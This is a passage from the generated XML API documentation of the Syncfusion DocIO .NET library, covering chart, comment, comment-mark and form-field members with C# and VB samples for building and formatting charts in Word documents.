            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the excel file as stream
                Stream excelStream = File.OpenRead("Excel_Template.xlsx");
                //Create and Append chart to the paragraph with excel stream as parameter
                WChart chart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300);
                //Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered_3D;
                chart.ChartTitle = "Purchase Details";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;          
                //Set name to chart series            
                chart.Series[0].Name = "Sum of Purchases";
                chart.Series[1].Name = "Sum of Future Expenses";
                chart.PrimaryCategoryAxis.Title = "Products";
                chart.PrimaryValueAxis.Title = "In Dollars";
                //Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom;
                //Set roatation and elevation values
                chart.Rotation = 20;
                chart.Elevation = 15;
                //Set the Backwall fill option.
                chart.BackWall.Fill.FillType = OfficeFillType.Gradient;
                //Set the Texture Type.
                chart.BackWall.Fill.GradientColorType = OfficeGradientColor.TwoColor;
                chart.BackWall.Fill.GradientStyle = OfficeGradientStyle.Diagonl_Down;
                chart.BackWall.Fill.ForeColor = Color.WhiteSmoke;
                chart.BackWall.Fill.BackColor = Color.LightBlue;
                //Set the Border Linecolor.
                chart.BackWall.Border.LineColor = System.Drawing.Color.Wheat;
                //Set the Picture Type.
                chart.BackWall.PictureUnit = OfficeChartPictureType.stretch;
                //Set the Backwall thickness.
                chart.BackWall.Thickness = 10;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the excel file as stream
                Dim excelStream As Stream = File.OpenRead("Excel_Template.xlsx")
                'Create and Append chart to the paragraph with excel stream as parameter
                Dim chart As WChart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300)
                'Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered_3D
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set name to chart series            
                chart.Series(0).Name = "Sum of Purchases"
                chart.Series(1).Name = "Sum of Future Expenses"
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Set rotation and elevation values
                chart.Rotation = 20
                chart.Elevation = 15
                'Set the Backwall fill option.
                chart.BackWall.Fill.FillType = OfficeFillType.Gradient
                'Set the Texture Type.
                chart.BackWall.Fill.GradientColorType = OfficeGradientColor.TwoColor
                chart.BackWall.Fill.GradientStyle = OfficeGradientStyle.Diagonl_Down
                chart.BackWall.Fill.ForeColor = Color.WhiteSmoke
                chart.BackWall.Fill.BackColor = Color.LightBlue
                'Set the Border Linecolor.
                chart.BackWall.Border.LineColor = System.Drawing.Color.Wheat
                'Set the Picture Type.
                chart.BackWall.PictureUnit = OfficeChartPictureType.stretch
                'Set the Backwall thickness.
                chart.BackWall.Thickness = 10
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <remarks>The 3D charts, stacked charts and clustered charts only can have back walls.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Floor">
            <summary>
            Gets the floor of the chart. Read-only.
            </summary>
            <remarks>The 3D charts, stacked charts and clustered charts only can have floor.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.DataTable">
            <summary>
            Gets the data table of the chart. Read-only.
            </summary>
            <value>The <see cref="!:http://www.google.com">IOfficeChartDataTable</see> instance that specifies the data table of chart.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.HasDataTable">
            <summary>
            Gets or sets value indicating whether the chart has a data table.
            </summary>
            <value><b>True </b>if the chart has data table; otherwise, <b>false</b>.</value>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the excel file as stream
                Stream excelStream = File.OpenRead("Excel_Template.xlsx");
                //Create and Append chart to the paragraph with excel stream as parameter
                WChart chart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300);
                //Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered;
                chart.ChartTitle = "Purchase Details";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;       
                //Set name to chart series            
                chart.Series[0].Name = "Sum of Purchases";
                chart.Series[1].Name = "Sum of Future Expenses";
                //Display data table
                chart.HasDataTable = true;
                chart.PrimaryCategoryAxis.Title = "Products";
                chart.PrimaryValueAxis.Title = "In Dollars";
                //Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom;
                //Save the document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the excel file as stream
                Dim excelStream As Stream = File.OpenRead("Excel_Template.xlsx")
                'Create and Append chart to the paragraph with excel stream as parameter
                Dim chart As WChart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300)
                'Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set name to chart series            
                chart.Series(0).Name = "Sum of Purchases"
                chart.Series(1).Name = "Sum of Future Expenses"
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Display data table
                chart.HasDataTable = True
                'Save the document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Legend">
            <summary>
            Gets the chart legend. Read-only.
            </summary> 
            <example>The following code illustrates how to apply the formatting for legend.
            <code lang = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                WParagraph paragraph = document.LastParagraph;
                //Get the chart entity
                WChart chart = paragraph.ChildEntities[0] as WChart;
                //Set the legend position
                chart.Legend.Position = OfficeLegendPosition.Left;
                //Set the layout inclusion
                chart.Legend.IncludeInLayout = true;
                //Set the legend border format - color, pattern, weight
                chart.Legend.FrameFormat.Border.AutoFormat = false;
                chart.Legend.FrameFormat.Border.IsAutoLineColor = false;
                chart.Legend.FrameFormat.Border.LineColor = Color.Blue;
                chart.Legend.FrameFormat.Border.LinePattern = OfficeChartLinePattern.DashDot;
                chart.Legend.FrameFormat.Border.LineWeight = OfficeChartLineWeight.Wide;
                //Set the legend's text area formatting - font name, weight, color, size
                chart.Legend.TextArea.Bold = true;
                chart.Legend.TextArea.Color = OfficeKnownColors.Bright_green;
                chart.Legend.TextArea.FontName = "Times New Roman";
                chart.Legend.TextArea.Size = 20;
                chart.Legend.TextArea.Strikethrough = true;
                //Modify the legend entry
                chart.Legend.LegendEntries[0].IsDeleted = true;
                //Modify the legend layout - height, left, top, width
                chart.Legend.Layout.Height = 50;
                chart.Legend.Layout.HeightMode = LayoutModes.factor;
                chart.Legend.Layout.Left = 10;
                chart.Legend.Layout.LeftMode = LayoutModes.factor;
                chart.Legend.Layout.Top = 30;
                chart.Legend.Layout.TopMode = LayoutModes.factor;
                chart.Legend.Layout.Width = 100;
                chart.Legend.Layout.WidthMode = LayoutModes.factor;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                Dim paragraph As WParagraph = document.LastParagraph
                'Get the chart entity
                Dim chart As WChart = TryCast(paragraph.ChildEntities(0), WChart)
                'Set the legend position
                chart.Legend.Position = OfficeLegendPosition.Left
                'Set the layout inclusion
                chart.Legend.IncludeInLayout = True
                'Set the legend border format - color, pattern, weight
                chart.Legend.FrameFormat.Border.AutoFormat = False
                chart.Legend.FrameFormat.Border.IsAutoLineColor = False
                chart.Legend.FrameFormat.Border.LineColor = Color.Blue
                chart.Legend.FrameFormat.Border.LinePattern = OfficeChartLinePattern.DashDot
                chart.Legend.FrameFormat.Border.LineWeight = OfficeChartLineWeight.Wide
                'Set the legend's text area formatting - font name, weight, color, size
                chart.Legend.TextArea.Bold = True
                chart.Legend.TextArea.Color = OfficeKnownColors.Bright_green
                chart.Legend.TextArea.FontName = "Times New Roman"
                chart.Legend.TextArea.Size = 20
                chart.Legend.TextArea.Strikethrough = True
                'Modify the legend entry
                chart.Legend.LegendEntries(0).IsDeleted = True
                'Modify the legend layout - height, left, top, width
                chart.Legend.Layout.Height = 50
                chart.Legend.Layout.HeightMode = LayoutModes.factor
                chart.Legend.Layout.Left = 10
                chart.Legend.Layout.LeftMode = LayoutModes.factor
                chart.Legend.Layout.Top = 30
                chart.Legend.Layout.TopMode = LayoutModes.factor
                chart.Legend.Layout.Width = 100
                chart.Legend.Layout.WidthMode = LayoutModes.factor
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.HasLegend">
            <summary>
            Gets or sets value indicating whether the chart has a legend.
            </summary>
            <value><b>True </b>if the chart has legend; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Rotation">
            <summary>
            Gets or sets the rotation value for x-axis of the 3-D chart, measured in degrees.
            </summary>
            <value>The <b>integer</b> that specifies the value for rotation.</value>
            <example>The following code illustrates how to rotation for 3D chart.
            <code lang = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the excel file as stream
                Stream excelStream = File.OpenRead("Excel_Template.xlsx");
                //Create and Append chart to the paragraph with excel stream as parameter
                WChart chart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300);
                //Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered_3D;
                chart.ChartTitle = "Purchase Details";
                chart.ChartTitleArea.FontName = "Calibri";
                chart.ChartTitleArea.Size = 14;
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None;          
                //Set name to chart series            
                chart.Series[0].Name = "Sum of Purchases";
                chart.Series[1].Name = "Sum of Future Expenses";
                chart.PrimaryCategoryAxis.Title = "Products";
                chart.PrimaryValueAxis.Title = "In Dollars";
                //Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom;
                //Set roatation and elevation values
                chart.Rotation = 20;
                chart.Elevation = 15;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the excel file as stream
                Dim excelStream As Stream = File.OpenRead("Excel_Template.xlsx")
                'Create and Append chart to the paragraph with excel stream as parameter
                Dim chart As WChart = paragraph.AppendChart(excelStream, 1, "B2:C6", 470, 300)
                'Set chart type and title
                chart.ChartType = OfficeChartType.Column_Clustered_3D
                chart.ChartTitle = "Purchase Details"
                chart.ChartTitleArea.FontName = "Calibri"
                chart.ChartTitleArea.Size = 14
                chart.ChartArea.Border.LinePattern = OfficeChartLinePattern.None
                'Set name to chart series            
                chart.Series(0).Name = "Sum of Purchases"
                chart.Series(1).Name = "Sum of Future Expenses"
                chart.PrimaryCategoryAxis.Title = "Products"
                chart.PrimaryValueAxis.Title = "In Dollars"
                'Set position of legend
                chart.Legend.Position = OfficeLegendPosition.Bottom
                'Set rotation and elevation values
                chart.Rotation = 20
                chart.Elevation = 15
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Elevation">
            <summary>
            Gets or sets the rotation value for y-axis of the 3-D chart, measured in degrees.
            </summary>
            <value>The <b>integer</b> that specifies the value for elevation.</value>
            <seealso cref="P:Syncfusion.DocIO.DLS.WChart.Rotation"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Perspective">
            <summary>
            Gets or sets the perspective value for the 3-D chart, measured in degrees.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.HeightPercent">
             <summary>
            Gets or sets the height of a 3-D chart as a percentage of the chart width(between 5 and 500 percent).
             </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.DepthPercent">
             <summary>
            Gets or sets the depth of a 3-D chart as a percentage of the chart width(between 20 and 2000 percent).
             </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.GapDepth">
            <summary>
            Gets or sets the distance between the data series in a 3-D chart, as a percentage of the marker width.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.RightAngleAxes">
            <summary>
            Gets or sets value indicating whether the chart axes are at right angles.
            </summary>
            <value><b>True</b> if the chart axis are at right angles; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.AutoScaling">
            <summary>
            Gets or sets a value indicating whether to scale a 3-D chart size.
            </summary>
            <value><b>True</b> if to scale the 3-D chart; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.HasPlotArea">
            <summary>
            Gets or sets a value indicating whether the chart has plot area.
            </summary>
            <value><b>True</b> if the chart has plot area; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.DisplayBlanksAs">
            <summary>
            Gets or sets a value indicating how that blank cells are plotted on a chart.
            </summary>
            <value>The <see cref="!:http://www.google.com">OfficeChartPlotEmpty</see> member that specifies how to plot empty cells.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.PlotVisibleOnly">
            <summary>
            Gets or sets a value indicating whether to plot only the visible cells of the data table.
            </summary>
            <value><b>True</b> if to plot only visible cells; <b>false</b> if both visible and hidden cells are plotted.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.Categories">
            <summary>
            Gets the collection of <see cref="!:http://www.google.com">IOfficeChartCategories</see> of the chart. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.SeriesNameLevel">
            <summary>
            Gets or sets the series name filter option for the chart.
            </summary>
            <value>The <see cref="!:http://www.google.com">OfficeSeriesNameLevel</see> member that specifies the filter option.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.CategoryLabelLevel">
            <summary>
            Gets or sets the category name filter option for the chart.
            </summary>
            <value>The <see cref="!:http://www.google.com">OfficeCategoriesLabelLevel</see> member that specifies the filter option.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.ChartData">
            <summary>
            Gets the chart data. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WChart.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WComment">
            <summary>
            Represents a comment in the Word document. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WComment.m_textBody">
            <summary>
            Represents the text body of comment.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WComment.m_format">
            <summary>
            Represents the formatting options for the comment.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WComment.m_commentRangeStart">
            <summary>
            Represents the comment range start of the comment
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WComment.m_commentRangeEnd">
            <summary>
            Represents the comment range end of the comment
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WComment"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An <see cref="T:System.Object"/> reference to the newly created instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.RemoveCommentedItems">
            <summary>
            Removes the items in the comment.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.RemoveItemsBetween(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Removes the items between.
            </summary>
            <param name="firstItem">The first item.</param>
            <param name="lastItem">The last item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.ReplaceCommentedItems(System.String)">
            <summary>
            Replace the contents of the comment with the specified text.
            </summary>
            <param name="text">The <b>string</b> that specifies the text to replace.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.ReplaceCommentedItems(Syncfusion.DocIO.DLS.TextBodyPart)">
            <summary>
            Replaces the commented items with specified TextBodyPart.
            </summary>
            <param name="textBodyPart">The text body part.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attach the comment items into the CommentsCollection
            </summary>
            <param name="owner"></param>
            <param name="itemPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.AddCommentedItem(Syncfusion.DocIO.DLS.IParagraphItem)">
            <summary>
            Adds the paragraph item to the commented items.
            </summary>
            <param name="paraItem">The paragraph item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.InitXDLSHolder">
            <summary>
            Initialize the XDLS holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.CreateLayoutInfo">
            <summary>
            Creates the layout info.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.InsertCommItem(Syncfusion.DocIO.DLS.WParagraph,System.Int32,Syncfusion.DocIO.DLS.IParagraphItem)">
            <summary>
            Inserts the commented item.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="index">The index.</param>
            <param name="item">The item to insert.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.FindCommentStart(System.Int32,System.String,Syncfusion.DocIO.DLS.ParagraphItemCollection)">
            <summary>
            Finds the comment start.
            </summary>
            <param name="index">The index.</param>
            <param name="startId">The start id.</param>
            <param name="itemCollection">The item collection.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.CheckTextBody(Syncfusion.DocIO.DLS.TextBodyItem)">
            <summary>
            Checks the text body on the existing of WComment objects.
            </summary>
            <param name="item">The item.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.CheckPara(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Checks the paragraph on the existing of WComment objects.
            </summary>
            <param name="para">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.CheckTable(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Checks the table on the existing of WComment objects.
            </summary>
            <param name="table">The table.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.RemoveFirstItem(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Removes the first item.
            </summary>
            <param name="firstItem">The first item.</param>
            <param name="lastItem">The last item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.FillCommItems">
            <summary>
            Fills the commented items from TextBodyPart.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.FillCommItems(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Fills the commented items from the paragraph.
            </summary>
            <param name="para">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.FillCommItems(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Fills the commented item from the table.
            </summary>
            <param name="table">The table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WComment.ModifyText(System.String)">
            <summary>
            Modifies the text.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.DLS.WComment.CommentRangeStart" -->
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.DLS.WComment.CommentRangeEnd" -->
        <member name="P:Syncfusion.DocIO.DLS.WComment.ChildEntities">
            <summary>
            Gets the child elements of the comment. Read-only.
            </summary>
            <value>The collection of child elements.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WComment.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WComment.TextBody">
            <summary>
            Gets the text body of the comment. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> instance that represents the text body.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WComment.Format">
            <summary>
            Gets the format options for the comment.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WCommentFormat"/> instance that represents format options of comment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WComment.CommentedItems">
            <summary>
            Gets the collection of items in the paragraph of the comment.
            </summary>
            <value>The paragraph items collection of the comment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WComment.AppendItems">
            <summary>
            Gets a value indicating whether to append commented items to the document .
            </summary>
            <value><c>true</c> if append items; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WComment.CommentedBodyPart">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WCommentMark">
            <summary>
            Represents comment start marker
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentMark.m_commentId">
            <summary>
            Id of the comment current mark refers to
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentMark.m_markType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentMark.m_ownerComment">
            <summary>
            Represents the owner comment of the comment mark
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentMark.#ctor(Syncfusion.DocIO.DLS.WordDocument,System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WCommentMark"/> class.
            </summary>
            <param name="doc">The document.</param>
            <param name="commentId">The comment id.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentMark.#ctor(Syncfusion.DocIO.DLS.WordDocument,System.String,Syncfusion.DocIO.DLS.CommentMarkType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WCommentMark"/> class.
            </summary>
            <param name="doc">The document.</param>
            <param name="commentId">The comment id.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentMark.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentMark.CreateLayoutInfo">
            <summary>
            <exclude/>
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.DLS.WCommentMark.Comment" -->
        <member name="P:Syncfusion.DocIO.DLS.WCommentMark.CommentId">
            <summary>
            Gets or sets the id of the comment this mark refers to.
            </summary>
            <value>The comment id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentMark.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentMark.Type">
            <summary>
            Gets or sets the type of the CommentMark.
            </summary>
            <value>The type.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WDropDownFormField">
            <summary>
            Summary description for WDropDownFormField.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WDropDownFormField.m_defaultDropDownValue">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownFormField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WDropDownFormField"/> class.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownFormField.CloneImpl">
            <summary>
            <exclude/>
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownFormField.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownFormField.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownFormField.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownFormField.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownFormField.CreateLayoutInfo">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownFormField.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WDropDownFormField.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WDropDownFormField.DropDownSelectedIndex">
            <summary>
            Gets/sets selected drop down index.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WDropDownFormField.DropDownItems">
            <summary>
            Gets drop down items.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WDropDownFormField.DefaultDropDownValue">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WDropDownFormField.DropDownValue">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WEmbedField">
            <summary>
            Represents an embeded field.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WEmbedField.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WEmbedField.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WEmbedField.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            </summary>
